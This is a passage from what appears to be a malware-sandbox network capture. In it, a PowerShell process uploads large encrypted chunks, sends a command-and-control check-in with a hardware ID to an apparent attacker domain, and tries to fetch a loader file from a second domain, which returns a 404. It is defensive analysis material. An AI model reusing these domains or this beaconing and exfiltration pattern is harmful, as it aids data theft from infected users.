                                                                                                  2025-01-06 12:56:41 UTC15331OUTData Raw: fd ad 1e 4c 2f 90 5a 5f 71 e5 49 7b 6b 5d 87 f9 09 a7 ae fa c3 68 28 ce 49 e4 b5 37 4f 28 bc d6 b4 c6 a3 d4 94 a2 22 d9 03 c2 f5 7c b9 22 38 45 3f a5 83 dc dc e8 10 47 e8 95 ec 3a 69 e5 f3 d2 1a 0d 2b 96 d4 9c 6b 2a f2 db 4d 62 0c 1a ea aa ba 95 50 df 19 79 4f cc 62 af 88 cb 04 1f aa b5 92 04 27 6e 34 5e da f1 16 98 73 dc 1b cd 76 84 be f6 c3 e7 fb eb 67 36 47 7e f4 e9 49 b1 e5 35 1a 69 33 2d fb b5 47 23 62 63 d2 18 3c a1 50 bc bc eb 97 fb 95 ab 65 2a 80 e6 aa 32 38 bd 04 99 55 87 db e5 a8 a8 e2 e7 43 db 57 d6 fc 46 db 36 2c 2b 5a d6 5e 6f ba c5 45 d6 ad ab 1d e4 49 54 51 19 68 dc 88 f7 38 24 92 66 c8 45 6d 03 f6 a6 79 9a a1 3f 47 47 b9 6d 40 0b 82 ff be a7 e2 30 c9 b4 82 13 f2 23 5a b4 f9 ee e0 aa 77 3a c9 21 af 96 2b c3 69 9d e2 49 3c 0c 88 17 88 2d 0e
                                                                                                  Data Ascii: L/Z_qI{k]h(I7O("|"8E?G:i+k*MbPyOb'n4^svg6G~I5i3-G#bc<Pe*28UCWF6,+Z^oEITQh8$fEmy?GGm@0#Zw:!+iI<-
                                                                                                  2025-01-06 12:56:41 UTC15331OUTData Raw: d5 a1 4a bf 15 5f f4 6f b7 dd c7 75 03 58 5e a9 58 1b 78 b2 6d 15 1e 44 1c 66 5a 74 ab bc 4e cb 91 d8 14 93 9e 0e 29 d9 c2 6e ed 4d 19 b1 d8 9b 79 03 5f d6 60 22 33 01 cd 0f df 63 04 2e ba ca 87 ea 3b b7 d6 18 7b 62 44 ce 54 21 70 5e 2a 39 66 51 bc 35 e4 71 ea d8 6c 72 b5 c3 01 af 89 3e b5 c2 f4 02 d1 19 32 d2 7c 92 ef 7b 91 af 60 5f 8c 97 ba 4e f6 2e 65 75 8c 2a e0 85 44 45 99 6b f3 a9 85 d8 7e ff 4c 17 9b 49 81 c3 3a cd de be 5b fb 84 92 13 f6 e6 e9 70 f9 f4 12 21 23 4f 50 7c 68 64 07 c8 5c 38 c7 6c 60 1c ba ec 11 6b 8a 65 4d 7d 2c f8 54 d9 05 b9 a5 84 09 20 47 d8 11 bf e2 9f 10 69 04 ec 62 2e cf d4 c0 34 50 a3 12 36 39 3d 93 d3 8c 03 fb d5 da ed e1 c7 60 46 b1 fa 3f 46 49 6b f0 64 eb 15 9e c0 bd 80 05 55 f9 5e 24 d2 fc c8 a9 ca 99 ea e1 03 af 74 77 7d
                                                                                                  Data Ascii: J_ouX^XxmDfZtN)nMy_`"3c.;{bDT!p^*9fQ5qlr>2|{`_N.eu*DEk~LI:[p!#OP|hd\8l`keM},T Gib.4P69=`F?FIkdU^$tw}
                                                                                                  2025-01-06 12:56:41 UTC15331OUTData Raw: 8d 21 9a 82 6d f6 99 4b 9f 2e ff 9b ed 90 bf a3 74 a5 c5 f0 59 ff dd 2a e3 d2 b9 ae fe bf af dc 2d fd 56 fb cf ab 3b 65 fb 4a 97 26 75 77 13 b8 bd ad 7f 57 71 ff 0c ef 21 6c 2c a5 b5 62 17 5f 29 83 9e 34 81 41 0a 0c 8b 08 98 54 6d 5e 17 05 69 0c b0 58 37 fe fb 10 c8 46 c1 4c ed 4c 2d 9c 05 20 64 43 28 04 42 1c ac 8b 43 39 af 07 d4 7e 9d 46 f2 42 29 38 b9 65 f6 c1 1e 03 04 2f 5c 14 3f bc 9f 90 b5 79 b1 3f fd a3 c6 f7 9d 22 a6 e8 70 18 7e d6 74 79 b9 bb bb f2 cf c2 55 d1 d4 30 b6 61 8e d9 87 18 96 b7 f7 86 fb 8b 47 10 29 c3 8b 7e 08 cc 5a 7b 0b 03 11 41 6c 8b e4 76 73 44 de f2 7a c9 a3 e6 db 97 45 35 f1 bc 14 db 7f 74 e9 e1 05 4f 7c db 3f f0 aa 3c d4 25 07 cb 43 77 4a 41 10 06 3e 84 c1 bf db 85 17 40 fc 99 4a cf 16 b4 19 ab f2 e3 a3 1f 7f 3b 9e 2e 00 2e fd
                                                                                                  Data Ascii: !mK.tY*-V;eJ&uwWq!l,b_)4ATm^iX7FLL- dC(BC9~FB)8e/\?y?"p~tyU0aG)~Z{AlvsDzE5tO|?<%CwJA>@J;..
                                                                                                  2025-01-06 12:56:41 UTC15331OUTData Raw: f8 8e db 86 d2 9a 0f 4a f6 95 a8 9c 44 3e 5a 58 0b c9 38 5a e5 cf 4e 06 71 43 8c 30 23 56 41 fc e6 24 3f 18 e1 5b 25 dd 99 38 ba d1 97 91 f3 9f 6b f9 5d 46 70 31 eb e6 5d 83 b9 88 79 a5 3b dc 1c c1 c1 82 2f bb d3 7e 98 dc b7 db f0 5e 2c 6d 4b 53 4a 69 0d ad a9 70 b9 74 69 73 93 cd e2 dc 8f 37 e3 e8 33 8e ce 2d 5b 04 4e 48 c1 bd 16 12 dd 80 1a 23 f1 bf e0 31 1b 5c ce 7c 4c 60 59 8e 1c 89 e4 cc 96 4f b8 ba 0c ce 94 2f 77 af 70 90 8a 8a 21 65 6c 16 4a 0b 4b 9b 4c 79 ea 5f b2 a0 84 5b d3 14 88 c1 58 f2 91 f8 2c 4b 9b 08 92 84 ac 5f 84 73 03 48 bd 8a ad 1d 16 15 ee bf 17 14 5a 2b 29 47 08 89 45 df 18 71 04 19 cd 0d ce 39 60 33 34 02 ed ba 56 0b f3 be 64 5c c2 e2 e3 df 3f 16 84 87 05 a1 3f 69 74 f7 e0 cf 42 8c 55 ff 99 ad 09 ff 53 55 7c c1 67 7a 02 9a 6e 7d 4b
                                                                                                  Data Ascii: JD>ZX8ZNqC0#VA$?[%8k]Fp1]y;/~^,mKSJiptis73-[NH#1\|L`YO/wp!elJKLy_[X,K_sHZ+)GEq9`34Vd\??itBUSU|gzn}K
                                                                                                  2025-01-06 12:56:41 UTC15331OUTData Raw: ff 64 14 92 cb 50 41 17 48 6e 24 58 e5 e4 ef 99 e3 d2 d4 8f 89 3a a3 ab 17 dd 12 83 30 5d 41 5f 6b 98 60 65 f7 8c 4d bd 7d db ba e3 a9 5f 7f ea 6a ff de 16 64 97 bf c0 23 8a 8e bc 99 10 f2 6e 04 e5 75 69 74 d2 f2 8d 30 38 09 ed d5 9a 36 fa ac 3a 45 28 60 e1 5b 06 65 66 61 17 a6 c6 89 7c 13 b5 0b f5 6d 95 26 47 58 f6 a7 5e 03 5e 3f 12 f6 47 f0 73 0c d0 cd 85 96 51 0c 4e 59 1e da 85 2f 3f 41 cd 63 63 20 9f 4a 64 93 a2 ab ee a2 ed e8 d9 46 00 87 95 da 46 8a ed 4e d9 c5 53 6d 15 1c 2d c1 1a 60 a1 5f eb 2f 5e b9 ec a7 1d 5d 77 7b 88 0c cb 37 40 18 3c 5e 48 f1 f2 5b 15 e5 7b 0d f6 ba 33 bb d6 5e a8 0a 3d 36 d6 b9 1f 95 7e 81 75 04 a9 3a ab 81 4f 5d b7 cd db 78 e6 87 b7 e9 e6 c7 a9 9e cf 63 29 1e 7e ef 0a 68 19 38 83 c5 f1 91 8d 13 fc d6 1f c3 68 5d 12 26 df bf
                                                                                                  Data Ascii: dPAHn$X:0]A_k`eM}_jd#nuit086:E(`[efa|m&GX^^?GsQNY/?Acc JdFFNSm-`_/^]w{7@<^H[{3^=6~u:O]xc)~h8h]&
                                                                                                  2025-01-06 12:56:41 UTC15331OUTData Raw: 6b 7f 5d d3 1e 3a 70 95 95 af ca 77 88 69 65 9f 1d b4 72 1e d7 3b 9d a2 0e 55 7d 23 97 40 96 95 32 98 d9 3a 63 68 a3 7a 8a 8c 4c 73 68 a3 a2 46 79 ae 99 30 a7 d5 4d 3b ff ec b7 be 24 54 9b 44 71 9a 8c a0 94 61 5e 89 38 e4 5d 26 d7 86 c9 42 5b 64 3e 55 0a 01 11 bb a2 40 c2 51 16 67 dd 7f 8c c8 ee 8b 69 0f 2d c5 35 d7 05 e4 bf 62 a0 73 76 29 96 ff 3b 4e ca fe a8 b4 f6 4d 8e f6 6d f9 f4 00 5b 44 39 82 41 9e ff 75 11 57 98 6c c5 ac f1 ee 47 a9 ee e9 0f 29 92 ee d3 9d 5a 66 39 d4 65 45 da d7 be 53 29 27 b0 7e 64 a6 94 16 9d 27 36 7d 2b ef 56 0e 2b f4 d3 96 ec 7f 27 cc 9c 98 df 0e 48 4e b1 a1 b8 af 16 a7 c2 07 fe f5 32 d8 b3 fc a1 6e f6 c5 6c e4 7b e9 46 af f0 97 8b d5 7a 33 ee ca b3 96 ff a0 cf fe 83 76 8d 90 9a ad 16 ed 58 fb c6 ea 9b 29 4d fb d8 17 f0 44 ba
                                                                                                  Data Ascii: k]:pwier;U}#@2:chzLshFy0M;$TDqa^8]&B[d>U@Qgi-5bsv);NMm[D9AuWlG)Zf9eES)'~d'6}+V+'HN2nl{Fz3vX)MD
                                                                                                  2025-01-06 12:56:43 UTC1137INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 06 Jan 2025 12:56:43 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=7djp5mns3a19k6cv1o7ceu5pnr; expires=Fri, 02 May 2025 06:43:22 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LkzgS73bZEVVLyZEAaJK6eRBz1HJPacPwecQAmoYxc4%2FVKI0AtQcmNn0YSjsiUPdbtWhN9xHU9NKR%2Bk%2B5XzhxFsFtTk0eoX9ybq4HSodklxF3%2FiHUW9M4fYWRrv9IM7ID1TlRd0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbde9e2d2172b9-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2005&min_rtt=2003&rtt_var=756&sent=207&recv=603&lost=0&retrans=0&sent_bytes=2845&recv_bytes=587755&delivery_rate=1441975&cwnd=214&unsent_bytes=0&cid=0013f8a327b12136&ts=1603&x=0"


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.450016104.21.43.2294431712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:56:43 UTC267OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 112
                                                                                                  Host: quantitypitt.click
                                                                                                  2025-01-06 12:56:43 UTC112OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 61 4e 4c 6a 2d 2d 72 65 34 26 6a 3d 32 63 37 62 33 34 39 62 38 63 66 33 30 32 30 33 64 39 35 65 61 66 38 66 32 64 38 66 34 37 31 30 26 68 77 69 64 3d 30 38 43 34 42 41 31 35 37 30 39 42 31 33 31 39 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35
                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=yJaNLj--re4&j=2c7b349b8cf30203d95eaf8f2d8f4710&hwid=08C4BA15709B131985E74BC4E94691B5
                                                                                                  2025-01-06 12:56:44 UTC1130INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 06 Jan 2025 12:56:44 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=nnfcor0gbe5at6srdqmms4r0cq; expires=Fri, 02 May 2025 06:43:23 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTokU6Ql6BwTqgO2i2oBYoBTCUdzkjhvv%2BHshjy958A3COqWER9v4Bib33g%2B9Fz1giGWJktdw%2BYYAA1X2efW4gY0fA7yq67NT3w79s5sULD6oofPvujdRbkEHG%2FqvvmsKBUebcs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbdeab3f78437e-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2348&min_rtt=2348&rtt_var=882&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1015&delivery_rate=1239915&cwnd=238&unsent_bytes=0&cid=acb113f439e01e55&ts=510&x=0"
                                                                                                  2025-01-06 12:56:44 UTC142INData Raw: 38 38 0d 0a 33 4b 2f 41 31 48 7a 4b 62 78 6c 5a 70 69 64 76 76 2b 44 6e 62 75 31 6e 6a 37 69 6c 63 36 63 4d 4c 63 2f 75 30 76 42 56 67 57 47 48 31 4f 4b 68 58 76 42 4e 63 53 33 53 56 78 79 46 76 4d 67 79 77 67 7a 6a 30 64 55 46 30 6d 46 45 76 4a 75 37 33 69 62 70 44 71 7a 7a 37 37 30 53 76 6a 42 36 4e 64 5a 34 41 39 75 53 75 42 32 46 42 71 48 4d 33 51 65 46 49 41 2b 70 6d 76 44 4b 5a 36 31 44 75 59 33 36 35 51 47 58 0d 0a
                                                                                                  Data Ascii: 883K/A1HzKbxlZpidvv+Dnbu1nj7ilc6cMLc/u0vBVgWGH1OKhXvBNcS3SVxyFvMgywgzj0dUF0mFEvJu73ibpDqzz770SvjB6NdZ4A9uSuB2FBqHM3QeFIA+pmvDKZ61DuY365QGX
                                                                                                  2025-01-06 12:56:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.2.450017172.67.208.584431712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:56:44 UTC210OUTGET /int_clp_ldr_sha.txt HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Host: klipvumisui.shop
                                                                                                  2025-01-06 12:56:45 UTC798INHTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 06 Jan 2025 12:56:45 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hzBssKwIIaqXtOgg2llxYGSvbq%2FepLNC8EfLIHjgRSSDU5eCf0BPLuuUtpwI2o4BljANGRAMDpBm7n0aKeEyJf%2BJHIN27dM7Rx1sRX1LO3yD2AqV3eXvLk6AiQPB093uytmd"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbdeb14a5a43eb-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1601&rtt_var=665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2867&recv_bytes=824&delivery_rate=1823860&cwnd=183&unsent_bytes=0&cid=0b9c9eb9935bf8ed&ts=303&x=0"
                                                                                                  2025-01-06 12:56:45 UTC571INData Raw: 36 61 30 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20
                                                                                                  Data Ascii: 6a0e<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title>
                                                                                                  2025-01-06 12:56:45 UTC1369INData Raw: 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 23 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 6d 61 69 6e 20 3e 20 73 65 63 74 69 6f 6e 20 3e 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 2e 32 35 72 65 6d
                                                                                                  Data Ascii: flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom: 3.25rem
                                                                                                  2025-01-06 12:56:45 UTC1369INData Raw: 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 23 66 6f 6f 74 65 72 2d 74 69 74 6c 65 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 2e 37 35 72 65 6d 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6d 61 69 6e 3e 0a 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 74 65 78 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 33
                                                                                                  Data Ascii: rem; margin-bottom: 1rem; } #footer-title { font-weight: 700; margin-bottom: 0.75rem; } </style> </head> <body> <main> <section id="text"> <div> <h1>Error 404</h1> <h3
                                                                                                  2025-01-06 12:56:45 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 32 30 35 2e 35 31 36 20 38 30 2e 32 36 37 34 48 31 33 39 2e 34 31 39 4c 31 34 38 2e 31 38 36 20 31 34 31 2e 32 33 37 48 31 39 37 2e 37 38 38 4c 32 30 35 2e 35 31 36 20 38 30 2e 32 36 37 34 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b
                                                                                                  Data Ascii: stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" strok
                                                                                                  2025-01-06 12:56:45 UTC1369INData Raw: 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 39 33 2e 31 34 36 20 31 30 35 2e 34 33 4c 31 38 38 2e 32 35 33 20 31 30 36 2e 39 33 31 43 31 38 38 2e 32 35 33 20 31 30 36 2e 39 33 31 20 31 38 36 2e 37 35 32 20 39 38 2e 33 35 39 31 20 31 38 31 2e 33 39 34 20 39 39 2e 36 34 37 37 43 31 37 36 2e 30 33 35 20 31 30 30 2e 39 33 36 20 31 37 37 2e 39 36 20 31 30 38 2e 32 32 20 31 37 37 2e 39 36 20 31 30 38 2e 32 32 48 31 37 33 2e 36 37 38 43 31 37 33 2e 36 37 38 20 31 30 38 2e 32 32 20 31 37 30 2e 38 38 39 20 39 35 2e 39 38 35 37 20 31 38 30 2e 35 33 37 20 39 34 2e 30 36 39 31 43 31 39 30 2e 31 38 36 20 39 32 2e 31 35 32 34 20 31
                                                                                                  Data Ascii: fill="#0055DC" /> <path d="M193.146 105.43L188.253 106.931C188.253 106.931 186.752 98.3591 181.394 99.6477C176.035 100.936 177.96 108.22 177.96 108.22H173.678C173.678 108.22 170.889 95.9857 180.537 94.0691C190.186 92.1524 1
                                                                                                  2025-01-06 12:56:45 UTC1369INData Raw: 20 31 30 37 2e 34 36 39 20 31 33 37 2e 36 34 32 20 31 30 38 2e 34 30 39 43 31 33 36 2e 37 30 33 20 31 30 39 2e 33 35 20 31 33 36 2e 31 37 36 20 31 31 30 2e 36 32 34 20 31 33 36 2e 31 37 36 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 43 31 31 39 2e 37 30 31 20 31 31 32 2e 36 31 32 20 31 31 39 2e 38 33 31 20 31 31 33 2e 32 36 34 20 31 32 30 2e 30 38 33 20 31 31 33 2e 38 37 32 43 31 32 30 2e 33 33 35 20 31 31 34 2e 34 38 20 31 32 30 2e 37 30 35 20 31 31 35 2e 30 33 32 20 31 32 31 2e 31 37
                                                                                                  Data Ascii: 107.469 137.642 108.409C136.703 109.35 136.176 110.624 136.176 111.953V111.953Z" fill="#0055DC" /> <path d="M119.701 111.953C119.701 112.612 119.831 113.264 120.083 113.872C120.335 114.48 120.705 115.032 121.17
                                                                                                  2025-01-06 12:56:45 UTC1369INData Raw: 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 36 33 2e 34 31 39 20 35 37 2e 36 32 37 33 48 38 35 2e 35 39 30 31 43 38 35 2e 35 39 30 31 20 35 37 2e 36 32 37 33 20 38 36 2e 38 37 30 37 20 32 30 2e 30 31 20 31 32 34 2e 35 20 32 30 2e 30 31 43 31 36 32 2e 31 33 20 32 30 2e 30 31 20 31 36 33 2e 34 31 39 20 35 37 2e 36 32 37 33 20 31 36 33 2e 34 31 39 20 35 37 2e 36 32 37 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20
                                                                                                  Data Ascii: <path d="M163.419 57.6273H85.5901C85.5901 57.6273 86.8707 20.01 124.5 20.01C162.13 20.01 163.419 57.6273 163.419 57.6273Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path
                                                                                                  2025-01-06 12:56:45 UTC1369INData Raw: 33 39 2e 36 30 36 20 34 33 2e 32 38 31 33 43 31 34 30 2e 33 39 35 20 34 34 2e 30 37 30 36 20 31 34 31 2e 34 36 36 20 34 34 2e 35 31 33 39 20 31 34 32 2e 35 38 32 20 34 34 2e 35 31 33 39 43 31 34 33 2e 36 39 37 20 34 34 2e 35 31 31 38 20 31 34 34 2e 37 36 35 20 34 34 2e 30 36 37 34 20 31 34 35 2e 35 35 32 20 34 33 2e 32 37 38 34 43 31 34 36 2e 33 34 20 34 32 2e 34 38 39 34 20 31 34 36 2e 37 38 32 20 34 31 2e 34 32 30 32 20 31 34 36 2e 37 38 32 20 34 30 2e 33 30 35 35 43 31 34 36 2e 37 38 20 33 39 2e 31 39 32 31 20 31 34 36 2e 33 33 37 20 33 38 2e 31 32 35 20 31 34 35 2e 35 34 39 20 33 37 2e 33 33 37 38 43 31 34 34 2e 37 36 32 20 33 36 2e 35 35 30 36 20 31 34 33 2e 36 39 35 20 33 36 2e 31 30 37 33 20 31 34 32 2e 35 38 32 20 33 36 2e 31 30 35 32 43 31 34 31
                                                                                                  Data Ascii: 39.606 43.2813C140.395 44.0706 141.466 44.5139 142.582 44.5139C143.697 44.5118 144.765 44.0674 145.552 43.2784C146.34 42.4894 146.782 41.4202 146.782 40.3055C146.78 39.1921 146.337 38.125 145.549 37.3378C144.762 36.5506 143.695 36.1073 142.582 36.1052C141
                                                                                                  2025-01-06 12:56:45 UTC1369INData Raw: 39 35 20 31 35 32 2e 39 37 33 20 31 34 37 2e 38 36 39 20 31 35 34 2e 37 36 20 31 34 39 2e 37 30 39 43 31 35 36 2e 35 34 37 20 31 35 31 2e 35 34 39 20 31 35 38 2e 39 39 32 20 31 35 32 2e 36 30 33 20 31 36 31 2e 35 35 36 20 31 35 32 2e 36 34 31 43 31 36 34 2e 31 32 20 31 35 32 2e 36 30 33 20 31 36 36 2e 35 36 35 20 31 35 31 2e 35 34 39 20 31 36 38 2e 33 35 32 20 31 34 39 2e 37 30 39 43 31 37 30 2e 31 33 39 20 31 34 37 2e 38 36 39 20 31 37 31 2e 31 32 32 20 31 34 35 2e 33 39 35 20 31 37 31 2e 30 38 36 20 31 34 32 2e 38 33 31 43 31 37 31 2e 31 32 32 20 31 34 30 2e 32 36 36 20 31 37 30 2e 31 33 39 20 31 33 37 2e 37 39 32 20 31 36 38 2e 33 35 32 20 31 33 35 2e 39 35 33 43 31 36 36 2e 35 36 35 20 31 33 34 2e 31 31 33 20 31 36 34 2e 31 32 20 31 33 33 2e 30 35 38
                                                                                                  Data Ascii: 95 152.973 147.869 154.76 149.709C156.547 151.549 158.992 152.603 161.556 152.641C164.12 152.603 166.565 151.549 168.352 149.709C170.139 147.869 171.122 145.395 171.086 142.831C171.122 140.266 170.139 137.792 168.352 135.953C166.565 134.113 164.12 133.058
